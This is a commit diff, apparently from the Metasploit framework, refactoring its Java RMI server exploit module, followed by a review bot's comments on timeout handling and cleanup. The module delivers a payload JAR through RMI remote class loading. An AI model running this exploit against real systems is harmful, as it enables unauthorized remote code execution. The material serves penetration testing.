
Commit 73ce4cb

committed
Use primer
1 parent 0bcb99c commit 73ce4cb


1 file changed

+23
-12
lines changed

1 file changed

+23
-12
lines changed

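--- a/modules/exploits/multi/misc/java_rmi_server.rb
+++ b/modules/exploits/multi/misc/java_rmi_server.rb
@@ -8,8 +8,8 @@
 class Metasploit3 < Msf::Exploit::Remote
 Rank = ExcellentRanking
 
-include Msf::Exploit::Remote::HttpServer
 include Msf::Exploit::Remote::Tcp
+include Msf::Exploit::Remote::HttpServer
 
 def initialize(info = {})
 super(update_info(info,
@@ -41,6 +41,10 @@ def initialize(info = {})
 'Privileged' => false,
 'Payload' => { 'BadChars' => '', 'DisableNops' => true },
 'Stance' => Msf::Exploit::Stance::Aggressive,
+'DefaultOptions' =>
+{
+'WfsDelay' => 10
+},
 'Targets' =>
 [
 [ 'Generic (Java Payload)',
@@ -76,14 +80,26 @@ def initialize(info = {})
 ],
 'DefaultTarget' => 0
 ))
-register_options( [ Opt::RPORT(1099) ], self.class)
+register_options([
+Opt::RPORT(1099),
+OptInt.new('HTTPDELAY', [true, 'Time that the HTTP Server will wait for the payload request', 10]),
+], self.class)
 
 register_autofilter_ports([ 1098, 1099 ])
 register_autofilter_services(%W{ rmi rmid java-rmi rmiregistry })
 end
 
 def exploit
-start_service()
+begin
+Timeout.timeout(datastore['HTTPDELAY']) { super }
+rescue Timeout::Error
+# When the server stops due to our timeout, fail and
+# don't wait WfsDelay
+fail_with(Failure::Unknown, "The HTTP Server didn't get a payload requests")
+end
+end
+
+def primer
 connect
 
 jar = rand_text_alpha(rand(8)+1) + '.jar'
@@ -106,11 +122,13 @@ def exploit
 buf = ""
 1.upto(6) do
 res = sock.get_once(-1, 5) rescue nil
-break if not res
+break unless res
 break if session_created?
 buf << res
 end
 
+disconnect
+
 if buf =~ /RMI class loader disabled/
 fail_with(Failure::NotVulnerable, "The RMI class loader is disabled")
 end
@@ -120,14 +138,6 @@ def exploit
 end
 
 print_good("Target #{rhost}:#{rport} may be exploitable...")
-
-# Wait for the request to be handled
-1.upto(120) do
-break if session_created?
-select(nil, nil, nil, 0.25)
-handler()
-end
-
 end
 
 def on_request_uri(cli, request)
@@ -148,6 +158,7 @@ def on_request_uri(cli, request)
 })
 
 print_status("Replied to request for payload JAR")
+stop_service
 end
 end
 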
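Review bot: In the new `exploit` method, the `rescue Timeout::Error` branch reports a known cause as `Failure::Unknown`, and its message reads "didn't get a payload requests"; `fail_with(Failure::TimeoutExpired, "The HTTP server did not receive a payload request within #{datastore['HTTPDELAY']} seconds")` would classify the failure correctly in logs and reports. `Timeout.timeout` raises asynchronously inside `super`, so this path should also guarantee that the HTTP listener serving the JAR is stopped and that the socket opened in `primer` is closed. As written, `disconnect` is reached only when the read loop finishes normally, and no `ensure` is visible in these hunks, although cleanup in the mixin, outside this view, may cover it. The body of `primer` spans several hunks and is only partly shown, and the top-of-file requires are not visible, so it is worth confirming that `timeout` is loaded.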
